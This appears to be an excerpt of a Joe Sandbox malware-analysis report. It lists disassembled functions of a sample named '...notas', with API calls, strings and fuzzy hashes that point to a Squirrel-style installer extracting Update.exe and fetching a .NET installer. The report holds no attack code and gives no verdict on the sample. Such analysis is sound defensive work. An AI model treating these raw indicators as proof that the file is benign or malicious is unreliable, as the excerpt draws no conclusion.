Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd758e00393eaa33c4b67c31499023e144c78dd6c8519ad43f3c3eaba950df5
Instruction ID: 3c3bd423dacdd8e36f77343cf4ad515d029acdb2a3c4c54bd3fc3eb4bf4e0218
Opcode Fuzzy Hash: fdd758e00393eaa33c4b67c31499023e144c78dd6c8519ad43f3c3eaba950df5
Instruction Fuzzy Hash: 6811AB23F30C2957275C816D8C1727AA6D2EBD815070F533BDC26E7384E994DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 00D442C9 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a5399a0e7d7690a80d5d41ac4c834c9ab5d7a1b0e39c18d4e9d0b676d0d319
Instruction ID: 09ff4e756a1aaec8f8f49cb322974de26111ef5c71fb8f5bd29ba8266e29b735
Opcode Fuzzy Hash: f8a5399a0e7d7690a80d5d41ac4c834c9ab5d7a1b0e39c18d4e9d0b676d0d319
Instruction Fuzzy Hash: A821A8305351B10A970D4B7ABC25533BF909B472033CB42AFE987E91C6C56ED5A0D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D552EB Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b49f341b2c4d21b5e45a47f73c39f37c7c68b2ac7f0d8e66cdc5e13c3d45f41
Instruction ID: 31c93c96a01161f3ec581d6cb9c86219efb80bbab3158a9d590484d13c2d33b1
Opcode Fuzzy Hash: 9b49f341b2c4d21b5e45a47f73c39f37c7c68b2ac7f0d8e66cdc5e13c3d45f41
Instruction Fuzzy Hash: 2DE08632921128EBCB15DBDCD50495AF3ECE705B51B15459AFD08D3100C2B0DE04CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00D412B1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fc39dc1626d52c2f7984cfcda2c4cefdbb8c487378a5cf5c5df2de72f1287a
Instruction ID: 5731478343c393856782ca713adc47d21ea58348fa6f45ed504fcf8ae14dcd33
Opcode Fuzzy Hash: 25fc39dc1626d52c2f7984cfcda2c4cefdbb8c487378a5cf5c5df2de72f1287a
Instruction Fuzzy Hash: 1AE01A75604684AFCB15CF59C841F55B7A9FB09B24F14466EE822D7B90CB75A8048A20

Uniqueness

Uniqueness Score: -1.00%

Function 00D467C6 Relevance: 56.4, APIs: 20, Strings: 12, Instructions: 364fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00D467C7
GetTempFileNameW.KERNEL32(?,Squirrel,?,?), ref: 00D467EB
DeleteFileW.KERNEL32(?,?,Squirrel,?,?), ref: 00D46800
PathIsUNCW.SHLWAPI(?,?,Squirrel,?,?), ref: 00D46807
CreateDirectoryW.KERNEL32(?,00000000), ref: 00D46852
GetLastError.KERNEL32 ref: 00D46860
FindResourceW.KERNEL32(00000083,DATA), ref: 00D46A03
LoadResource.KERNEL32(00000000), ref: 00D46A20
SizeofResource.KERNEL32(00000000), ref: 00D46A44
LockResource.KERNEL32(00000000), ref: 00D46A59
DeleteFileW.KERNEL32(?), ref: 00D46B25
FreeResource.KERNEL32(00000000), ref: 00D46BE0
FreeResource.KERNEL32(?,Failed to extract installer), ref: 00D46DF2

Strings

Unable to write to %s - IT policies may be restricting access to this folder, xrefs: 00D46878
%s\%s, xrefs: 00D46B10, 00D46C06
Update.exe, xrefs: 00D46BE6
\SquirrelTemp, xrefs: 00D46831
DATA, xrefs: 00D469F3
Squirrel, xrefs: 00D467E5
.Wup1Wu, xrefs: 00D46D57
%s\SquirrelSetup.log, xrefs: 00D469E5
"%s" --install . %s, xrefs: 00D46C7C
D, xrefs: 00D46C2F
Failed to extract installer, xrefs: 00D46D69
There was an error while installing the application. Check the setup log for more information and contact the author., xrefs: 00D46CF1

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Resource$File$DeleteFree$AttributesCreateDirectoryErrorFindLastLoadLockNamePathSizeofTemp
String ID: "%s" --install . %s$%s\%s$%s\SquirrelSetup.log$D$DATA$Failed to extract installer$Squirrel$There was an error while installing the application. Check the setup log for more information and contact the author.$Unable to write to %s - IT policies may be restricting access to this folder$Update.exe$\SquirrelTemp$.Wup1Wu
API String ID: 529842104-437421836
Opcode ID: f2408d1484ba91cb9db42cc5f71b1aff486b9eec40d5b05d8c3f259e1bf6be35
Instruction ID: 1b45287154e7a231c365bf53d7069a83a2f68f1cefa705bae34eaea25bd551de
Opcode Fuzzy Hash: f2408d1484ba91cb9db42cc5f71b1aff486b9eec40d5b05d8c3f259e1bf6be35
Instruction Fuzzy Hash: 08D17E71E012289BDB25DB64CC55ADEB7BDEB05300F0441A9E90AE3291DB74DF888F72

Uniqueness

Uniqueness Score: -1.00%

Function 00D412EC Relevance: 37.1, APIs: 9, Strings: 12, Instructions: 337filesynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D412F6
GetTempPathW.KERNEL32(00000104,?,-00000068), ref: 00D4149F
GetTempFileNameW.KERNEL32(?,NDP,00000000,?), ref: 00D414D6
_wcsrchr.LIBVCRUNTIME ref: 00D41517
MoveFileW.KERNEL32(?,?), ref: 00D4154F
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D416AB
GetExitCodeProcess.KERNEL32(?,?), ref: 00D416BE
CloseHandle.KERNEL32(?), ref: 00D41721
DeleteFileW.KERNEL32(00000000), ref: 00D41738

Strings

/q /norestart, xrefs: 00D41676
<, xrefs: 00D41443
NDP, xrefs: 00D414CA
.exe, xrefs: 00D41520
Downloading, xrefs: 00D41590
Install, xrefs: 00D41339
@, xrefs: 00D41655
.Wup1Wu, xrefs: 00D41721
Cancel, xrefs: 00D41343
Downloading the .NET Framework installer, xrefs: 00D415A3
open, xrefs: 00D4166C
/passive /norestart /showrmui, xrefs: 00D41665

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: File$Temp$CloseCodeDeleteExitH_prolog3_HandleMoveNameObjectPathProcessSingleWait_wcsrchr
String ID: .exe$/passive /norestart /showrmui$/q /norestart$<$@$Cancel$Downloading$Downloading the .NET Framework installer$Install$NDP$open$.Wup1Wu
API String ID: 1126903545-541025239
Opcode ID: d83f4d4a36749820f2d13a391c187e2782ace32217e6e728aed7ba5cbc64cf2f
Instruction ID: a4bef08faf001c219f14b17187ded2e9551c2b1985c30b3e0aa0d09e03f52684
Opcode Fuzzy Hash: d83f4d4a36749820f2d13a391c187e2782ace32217e6e728aed7ba5cbc64cf2f
Instruction Fuzzy Hash: 64C18079E403289FDB209F64CC89B9977B9AB44710F1901A5E849EB291DB31CED4CF70

Uniqueness

Uniqueness Score: -1.00%

Function 00D5704F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00D57093

Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56BD3
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56BE5
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56BF7
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C09
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C1B
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C2D
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C3F
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C51
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C63
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C75
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C87
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56C99
Part of subcall function 00D56BB6: _free.LIBCMT ref: 00D56CAB

_free.LIBCMT ref: 00D57088

Part of subcall function 00D5363A: HeapFree.KERNEL32(00000000,00000000,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?), ref: 00D53650
Part of subcall function 00D5363A: GetLastError.KERNEL32(?,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?,?), ref: 00D53662

_free.LIBCMT ref: 00D570AA
_free.LIBCMT ref: 00D570BF
_free.LIBCMT ref: 00D570CA
_free.LIBCMT ref: 00D570EC
_free.LIBCMT ref: 00D570FF
_free.LIBCMT ref: 00D5710D
_free.LIBCMT ref: 00D57118
_free.LIBCMT ref: 00D57150
_free.LIBCMT ref: 00D57157
_free.LIBCMT ref: 00D57174
_free.LIBCMT ref: 00D5718C

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: fc21f95aabee41e927a624d1edb88c477cd35bb81c2d57f0677fa44d8655cb35
Instruction ID: b8312ac1d14551d5ae561bb6849a16779a4c5af14f6899f0fa291a04136562d0
Opcode Fuzzy Hash: fc21f95aabee41e927a624d1edb88c477cd35bb81c2d57f0677fa44d8655cb35
Instruction Fuzzy Hash: 4B315E31604704AFDF25AA38E845B56B3E8FF10392F288419FC49D7291DE31AD889B34

Uniqueness

Uniqueness Score: -1.00%

Function 00D49568 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 119libraryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00D49572
LoadLibraryExW.KERNEL32(?,00000000,00000060,00D672B0,Module,?), ref: 00D495BD
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 00D495D3
FindResourceW.KERNEL32(00000000,?,?), ref: 00D495FE
LoadResource.KERNEL32(00000000,00000000), ref: 00D49616
SizeofResource.KERNEL32(00000000,00000000), ref: 00D49628

Part of subcall function 00D41C76: GetLastError.KERNEL32(00D414AE), ref: 00D41C76

FreeLibrary.KERNEL32(00000000), ref: 00D496EE

Strings

Module, xrefs: 00D498CF
REGISTRY, xrefs: 00D4991B
Module_Raw, xrefs: 00D498EF

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: LibraryLoadResource$ErrorFindFreeH_prolog3_catch_LastSizeof
String ID: Module$Module_Raw$REGISTRY
API String ID: 1818814483-549000027
Opcode ID: 86086daca5db88bbee8c2700feb15d430f6730d6f4dbc057868d0a9e196e87e7
Instruction ID: ff233f70f3057988544809d00c4b5468ebf8ab479990fb8decada78452c9e7d8
Opcode Fuzzy Hash: 86086daca5db88bbee8c2700feb15d430f6730d6f4dbc057868d0a9e196e87e7
Instruction Fuzzy Hash: AD4187B1A002199BCF219F558C95B9EBAF8EF48351F5540A5FA09E6252DB308E40CF78

Uniqueness

Uniqueness Score: -1.00%

Function 00D48069 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 258stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D48070
_wcsstr.LIBVCRUNTIME ref: 00D48145
EnterCriticalSection.KERNEL32(00000011,?,?,?,?,?,00D496E7,00000000,?), ref: 00D48281
lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,00D496E7,00000000,?), ref: 00D4829D
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,00D496E7,00000000,?), ref: 00D482C9

Strings

', xrefs: 00D48121
HKCR, xrefs: 00D4813F
%, xrefs: 00D48128
}}, xrefs: 00D48205
HKCU{Software{Classes, xrefs: 00D48177

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: CriticalSection$EnterH_prolog3_Leave_wcsstrlstrcmpi
String ID: }}$%$'$HKCR$HKCU{Software{Classes
API String ID: 2331752857-792530599
Opcode ID: a5f66ceaf4feab7ec5ee30db5d43689d39f8de1afa161cb1786f59bce1ef8db9
Instruction ID: 83bf0b6fa1fa618e6a768bba354f7113966d63855f4a24b7991b799042e76018
Opcode Fuzzy Hash: a5f66ceaf4feab7ec5ee30db5d43689d39f8de1afa161cb1786f59bce1ef8db9
Instruction Fuzzy Hash: 30919F31E04345DFDF209FA8C8986ADBBB5AF04780F284129E846EB295DF709C44EB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D42641 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(DeploymentTool.exe,?,00000000), ref: 00D42659
lstrlenW.KERNEL32(00D65110,?,?,00000000), ref: 00D4266C
_wcsstr.LIBVCRUNTIME ref: 00D42692
_wcsstr.LIBVCRUNTIME ref: 00D426A7
lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D426B6
_wcsstr.LIBVCRUNTIME ref: 00D4275D
_wcsstr.LIBVCRUNTIME ref: 00D427DE
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00D427F1

Strings

DeploymentTool.exe, xrefs: 00D42651, 00D4268C, 00D426A1, 00D42757, 00D427D8

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: _wcsstrlstrlen
String ID: DeploymentTool.exe
API String ID: 4267858634-1188192670
Opcode ID: f931839ff28a27661a672e3ec921432c157b87ef7dd17454f396c0596f711b0d
Instruction ID: 3251a4d1b116b8b0b48573e34d472c80c80fa0a904f2216a0d7bc393a703511f
Opcode Fuzzy Hash: f931839ff28a27661a672e3ec921432c157b87ef7dd17454f396c0596f711b0d
Instruction Fuzzy Hash: 40515C31E0020A9FCB14DFA8D8C19BEB7B8FF48314B55046AE551A7291EB70AA45CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D530B8 Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D530CE

Part of subcall function 00D5363A: HeapFree.KERNEL32(00000000,00000000,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?), ref: 00D53650
Part of subcall function 00D5363A: GetLastError.KERNEL32(?,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?,?), ref: 00D53662

_free.LIBCMT ref: 00D530DA
_free.LIBCMT ref: 00D530E5
_free.LIBCMT ref: 00D530F0
_free.LIBCMT ref: 00D530FB
_free.LIBCMT ref: 00D53106
_free.LIBCMT ref: 00D53111
_free.LIBCMT ref: 00D5311C
_free.LIBCMT ref: 00D53127
_free.LIBCMT ref: 00D53135

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f6261dd2a3ab3a1f73df9478ec2fee8e5404dc92984fad323ab400ec59eb9ba6
Instruction ID: 8d2d6907438940edda56a6d6d02104d95717f2414ae1087b1a8e2f4cd4e931d4
Opcode Fuzzy Hash: f6261dd2a3ab3a1f73df9478ec2fee8e5404dc92984fad323ab400ec59eb9ba6
Instruction Fuzzy Hash: 0321AA76900108BFCF05EF94C851DDD7BB5EF08381F408169FD159B261DA31DB599BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D45DE0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 214filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 00D45FB9
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D46032
SetFileTime.KERNEL32(?,?,?,?), ref: 00D46071
CloseHandle.KERNEL32(?), ref: 00D46082

Strings

:, xrefs: 00D45F3E
%s%s, xrefs: 00D45F81
.Wup1Wu, xrefs: 00D46082
%s%s%s, xrefs: 00D45F60

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: File$CloseCreateHandleTimeWrite
String ID: %s%s$%s%s%s$:$.Wup1Wu
API String ID: 3229859547-3090469793
Opcode ID: df2e0a24b4da460527957df570c6a0e1b82acc0360ef799e27b0a78c6fa1536f
Instruction ID: d7f52c872c65530435645bdb4fe46dea66240a59ec866597c99d2082936913d7
Opcode Fuzzy Hash: df2e0a24b4da460527957df570c6a0e1b82acc0360ef799e27b0a78c6fa1536f
Instruction Fuzzy Hash: D571C371204B409BD730EF68E889BABB3E5EF85311F14093EF59A87196DB30D9488772

Uniqueness

Uniqueness Score: -1.00%

Function 00D561EE Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00D56218
_free.LIBCMT ref: 00D562FB

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: _free_wcschr
String ID:
API String ID: 3422831350-0
Opcode ID: 1858c8a8d9ca67f812c02c9135c0a99ff9fdab43efd48ad581f3b2e936157dfb
Instruction ID: 6b604366fa38bae65154d4750f093d226ee68d5a568a993f1aacd024f2c4acb6
Opcode Fuzzy Hash: 1858c8a8d9ca67f812c02c9135c0a99ff9fdab43efd48ad581f3b2e936157dfb
Instruction Fuzzy Hash: AA61D471A00305ABDF24AFA8C885A6E77E4EF05366F98456DFD05D7381EB70D9488BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D4695F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 00D46852
GetLastError.KERNEL32 ref: 00D46860
CreateDirectoryW.KERNEL32(?), ref: 00D4696A
GetLastError.KERNEL32 ref: 00D46978
FreeResource.KERNEL32(?,Failed to extract installer), ref: 00D46DF2

Strings

Unable to write to %s - IT policies may be restricting access to this folder, xrefs: 00D46878, 00D46990
\SquirrelTemp, xrefs: 00D46831

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: CreateDirectoryErrorLast$FreeResource
String ID: Unable to write to %s - IT policies may be restricting access to this folder$\SquirrelTemp
API String ID: 2750073017-3128572547
Opcode ID: 7432efb734b6a59e8f643aad40cecfe3c168b869647fdddf21a7908e5f40a274
Instruction ID: e73a477588765631d64fd6d3665690e751818d7b7e47a2cc96b93abf795d8491
Opcode Fuzzy Hash: 7432efb734b6a59e8f643aad40cecfe3c168b869647fdddf21a7908e5f40a274
Instruction Fuzzy Hash: 0A417371E012189BDB25DB64CC99BDDB7B9EB14700F0800E5E54AE3281EB74DF848A72

Uniqueness

Uniqueness Score: -1.00%

Function 00D4C200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D4C22B
___except_validate_context_record.LIBVCRUNTIME ref: 00D4C233
_ValidateLocalCookies.LIBCMT ref: 00D4C2C1
__IsNonwritableInCurrentImage.LIBCMT ref: 00D4C2EC
_ValidateLocalCookies.LIBCMT ref: 00D4C341

Strings

csm, xrefs: 00D4C2D6

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: eacade5b452256fad9d8a7ec3cc43ef84a87b3458a566f3962294c9802a9094f
Instruction ID: dfee35c79afb01c6053dcbc28fd9279b55b3c53beb4d6158beaabde7da5f7fce
Opcode Fuzzy Hash: eacade5b452256fad9d8a7ec3cc43ef84a87b3458a566f3962294c9802a9094f
Instruction Fuzzy Hash: 6541B235A11218AFCF10DFA8C884A9EBBB5FF45324F188165E8159B392D7B1DA05CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D54846 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 00D548B1
api-ms-, xrefs: 00D5489D

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: b06ee4de467c57af69e869d8e083a3de5565fe17721522f3418e163bd22fc1d1
Instruction ID: c8d844a648db0e345175383eedd2e6deb07fcfa386eee9d7e07ce1de60e14cb2
Opcode Fuzzy Hash: b06ee4de467c57af69e869d8e083a3de5565fe17721522f3418e163bd22fc1d1
